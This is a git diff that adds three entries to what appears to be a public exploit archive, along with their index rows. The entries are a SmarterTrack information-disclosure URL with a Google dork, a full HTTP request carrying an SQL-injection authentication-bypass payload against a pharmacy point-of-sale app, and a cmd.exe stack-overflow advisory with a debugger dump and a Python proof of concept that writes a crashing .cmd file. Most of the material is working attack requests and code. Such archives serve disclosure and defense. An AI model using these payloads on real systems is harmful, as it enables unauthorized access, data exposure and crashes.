diff --git a/exploits/aspx/webapps/50328.txt b/exploits/aspx/webapps/50328.txt new file mode 100644 index 000000000..17bfc1345 --- /dev/null +++ b/exploits/aspx/webapps/50328.txt @@ -0,0 +1,12 @@ +# Exploit Title: SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure +# Google Dork: intext:"Powered by SmarterTrack" +# Date: 23/01/2020 +# Exploit Author: Andrei Manole +# Vendor Homepage: https://www.smartertools.com/ +# Software Link: https://www.smartertools.com/smartertrack +# Version: TESTED ON 10.x -> 14.x and to Build 7922 (set 9, 2021) +# Tested on: Windows 10 + +POC: +VULNERABLE TARGET/Management/Chat/frmChatSearch.aspx +This file disclosure all agents id and first name and second name \ No newline at end of file diff --git a/exploits/php/webapps/50329.txt b/exploits/php/webapps/50329.txt new file mode 100644 index 000000000..4306b86d3 --- /dev/null +++ b/exploits/php/webapps/50329.txt @@ -0,0 +1,26 @@ +# Exploit Title: Pharmacy Point of Sale System 1.0 - SQLi Authentication Bypass +# Date: 23.09.2021 +# Exploit Author: Janik Wehrli +# Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip +# Version: 1.0 +# Tested on: Kali Linux, Windows 10 + +# Pharmacy Point of Sale System v1.0 Login can be bypassed with a simple SQLi + + +POST /pharmacy/Actions.php?a=login HTTP/1.1 +Host: 192.168.209.170 +Content-Length: 38 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: http://192.168.209.170 +Referer: http://192.168.209.170/pharmacy/login.php +Accept-Encoding: gzip, deflate +Accept-Language: de-CH,de-DE;q=0.9,de;q=0.8,en-US;q=0.7,en;q=0.6 +Cookie: PHPSESSID=c5mtnqpcavhfgsambtnh4uklag +Connection: close + +username='OR+1%3D1+--+-&password=PWNED \ No newline at end of file diff --git a/exploits/windows/local/50331.txt b/exploits/windows/local/50331.txt new file mode 100644 index 000000000..ed23c886e --- /dev/null +++ b/exploits/windows/local/50331.txt @@ -0,0 +1,169 @@ +# Title: Microsoft Windows cmd.exe - Stack Buffer Overflow +# Author: John Page (aka hyp3rlinx) +# Date: 15/09/2021 +# Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt +# ISR: ApparitionSec + +[Vendor] +www.microsoft.com + + +[Product] +cmd.exe is the default command-line interpreter for the OS/2, eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows CE family), and ReactOS operating systems. + + +[Vulnerability Type] +Stack Buffer Overflow + + +[CVE Reference] +N/A + + +[Security Issue] +Specially crafted payload will trigger a Stack Buffer Overflow in the NT Windows "cmd.exe" commandline interpreter. Requires running an already dangerous file type like .cmd or .bat. However, when cmd.exe accepts arguments using /c /k flags which execute commands specified by string, that will also trigger the buffer overflow condition. + +E.g. cmd.exe /c . + +[Memory Dump] +(660.12d4): Stack buffer overflow - code c0000409 (first/second chance not available) +ntdll!ZwWaitForMultipleObjects+0x14: +00007ffb`00a809d4 c3 ret + + +0:000> .ecxr +rax=0000000000000022 rbx=000002e34d796890 rcx=00007ff7c0e492c0 +rdx=00007ff7c0e64534 rsi=000000000000200e rdi=000000000000200c +rip=00007ff7c0e214f8 rsp=000000f6a82ff0a0 rbp=000000f6a82ff1d0 +r8=000000000000200c r9=00007ff7c0e60520 r10=0000000000000000 +r11=0000000000000000 r12=000002e34d77a810 r13=0000000000000002 +r14=000002e34d796890 r15=000000000000200d +iopl=0 nv up ei pl nz na pe nc +cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 +cmd!StripQuotes+0xa8: +00007ff7`c0e214f8 cc int 3 + +0:000> !analyze -v +******************************************************************************* +* * + +* Exception Analysis * + +* * +******************************************************************************* + +Failed calling InternetOpenUrl, GLE=12029 + +FAULTING_IP: +cmd!StripQuotes+a8 +00007ff7`c0e214f8 cc int 3 + + +EXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff) +ExceptionAddress: 00007ff7c0e214f8 (cmd!StripQuotes+0x00000000000000a8) + ExceptionCode: c0000409 (Stack buffer overflow) + ExceptionFlags: 00000001 +NumberParameters: 1 + Parameter[0]: 0000000000000008 + +PROCESS_NAME: cmd.exe + +ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. + +EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application. + +EXCEPTION_PARAMETER1: 0000000000000008 + +MOD_LIST: + +NTGLOBALFLAG: 0 + +APPLICATION_VERIFIER_FLAGS: 0 + +FAULTING_THREAD: 00000000000012d4 + +BUGCHECK_STR: APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE + +PRIMARY_PROBLEM_CLASS: STACK_BUFFER_OVERRUN_EXPLOITABLE + +DEFAULT_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE + +LAST_CONTROL_TRANSFER: from 00007ffafcfca9c6 to 00007ffb00a809d4 + +STACK_TEXT: +000000f6`a82fea38 00007ffa`fcfca9c6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!ZwWaitForMultipleObjects+0x14 +000000f6`a82fea40 00007ffa`fcfca8ae : 00000000`00000098 00000000`00000096 00000000`d000022d 00000000`d000022d : KERNELBASE!WaitForMultipleObjectsEx+0x106 +000000f6`a82fed40 00007ffa`fe1d190e : 00000000`00000000 000000f6`a82ff1d0 00007ff7`c0e3e000 00007ffb`009f5a81 : KERNELBASE!WaitForMultipleObjects+0xe +000000f6`a82fed80 00007ffa`fe1d150f : 00000000`00000000 00000000`00000000 00000000`00000003 00000000`00000001 : kernel32!WerpReportFaultInternal+0x3ce +000000f6`a82feea0 00007ffa`fd05976b : 00000000`00000000 000000f6`a82ff1d0 00000000`00000004 00000000`00000000 : kernel32!WerpReportFault+0x73 +000000f6`a82feee0 00007ff7`c0e26b6a : 00007ff7`c0e3e000 00007ff7`c0e3e000 00000000`0000200e 00000000`0000200c : KERNELBASE!UnhandledExceptionFilter+0x35b +000000f6`a82feff0 00007ff7`c0e26df6 : 000002e3`00000000 00007ff7`c0e10000 000002e3`4d796890 00007ff7`c0e6602c : cmd!_raise_securityfailure+0x1a +000000f6`a82ff020 00007ff7`c0e214f8 : 000002e3`4d77a810 00000000`00000000 00000000`00000002 00000000`0000200e : cmd!_report_rangecheckfailure+0xf2 +000000f6`a82ff0a0 00007ff7`c0e2096f : 00000000`0000200c 000000f6`a82ff1d0 000000f6`a82ff1d0 00000000`0000200e : cmd!StripQuotes+0xa8 +000000f6`a82ff0d0 00007ff7`c0e239a9 : 000002e3`4d76ff90 000002e3`4d76ff90 00000000`00000000 000002e3`4d76ff90 : cmd!SearchForExecutable+0x443 +000000f6`a82ff390 00007ff7`c0e1fb9e : 00000000`00000000 000002e3`4d76ff90 ffffffff`ffffffff 000002e3`4d990000 : cmd!ECWork+0x69 +000000f6`a82ff600 00007ff7`c0e1ff35 : 00007ff7`c0e4fbb0 000002e3`4d76ff90 00000000`00000000 00000000`00000001 : cmd!FindFixAndRun+0x3de +000000f6`a82ffaa0 00007ff7`c0e2277e : 00000000`00000002 000000f6`a82ffbb0 00000000`00000000 00000000`00000002 : cmd!Dispatch+0xa5 +000000f6`a82ffb30 00007ff7`c0e26a89 : 00000000`00000001 00000000`00000000 00007ff7`c0e3fd78 00000000`00000000 : cmd!main+0x1fa +000000f6`a82ffbd0 00007ffa`fe1e1fe4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : cmd!wil::details_abi::ProcessLocalStorage::~ProcessLocalStorage+0x289 +000000f6`a82ffc10 00007ffb`00a4efc1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14 +000000f6`a82ffc40 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21 + +FOLLOWUP_IP: +cmd!StripQuotes+a8 +00007ff7`c0e214f8 cc int 3 + +SYMBOL_STACK_INDEX: 8 + +SYMBOL_NAME: cmd!StripQuotes+a8 + +FOLLOWUP_NAME: MachineOwner + +MODULE_NAME: cmd + +IMAGE_NAME: cmd.exe + +DEBUG_FLR_IMAGE_TIMESTAMP: 0 + +STACK_COMMAND: ~0s ; kb + +FAILURE_BUCKET_ID: STACK_BUFFER_OVERRUN_EXPLOITABLE_c0000409_cmd.exe!StripQuotes + +BUCKET_ID: X64_APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE_MISSING_GSFRAME_cmd!StripQuotes+a8 + + +[Exploit/POC] +PAYLOAD=chr(235) + "\\CC" +PAYLOAD = PAYLOAD * 3000 + +with open("hate.cmd", "w") as f: + f.write(PAYLOAD) + + +[Network Access] +Local + + +[Video PoC URL] +https://www.youtube.com/watch?v=wYYgjV-PzD8 + + +[Severity] +Low + + +[Disclosure Timeline] +Vendor Notification: Requires running dangerous file types already. + +September 15, 2021 : Public Disclosure + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information +or exploits by the author or elsewhere. All content (c). + +hyp3rlinx \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 03fa3eeb2..55e221abd 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11391,6 +11391,7 @@ id,file,description,date,author,type,platform,port 50273,exploits/windows/local/50273.txt,"Active WebCam 11.5 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, 50283,exploits/hardware/local/50283.txt,"ECOA Building Automation System - Missing Encryption Of Sensitive Information",1970-01-01,Neurogenesia,local,hardware, 50289,exploits/python/local/50289.py,"Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai",1970-01-01,"Abhiram V",local,python, +50331,exploits/windows/local/50331.txt,"Microsoft Windows cmd.exe - Stack Buffer Overflow",1970-01-01,hyp3rlinx,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -44444,3 +44445,5 @@ id,file,description,date,author,type,platform,port 50325,exploits/php/webapps/50325.html,"WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)",1970-01-01,0xB9,webapps,php, 50326,exploits/php/webapps/50326.txt,"Budget and Expense Tracker System 1.0 - Arbitrary File Upload",1970-01-01,"()t/\\/\\1",webapps,php, 50327,exploits/php/webapps/50327.txt,"Police Crime Record Management Project 1.0 - Time Based SQLi",1970-01-01,"()t/\\/\\1",webapps,php, +50328,exploits/aspx/webapps/50328.txt,"SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure",1970-01-01,"Andrei Manole",webapps,aspx, +50329,exploits/php/webapps/50329.txt,"Pharmacy Point of Sale System 1.0 - SQLi Authentication BYpass",1970-01-01,"Janik Wehrli",webapps,php,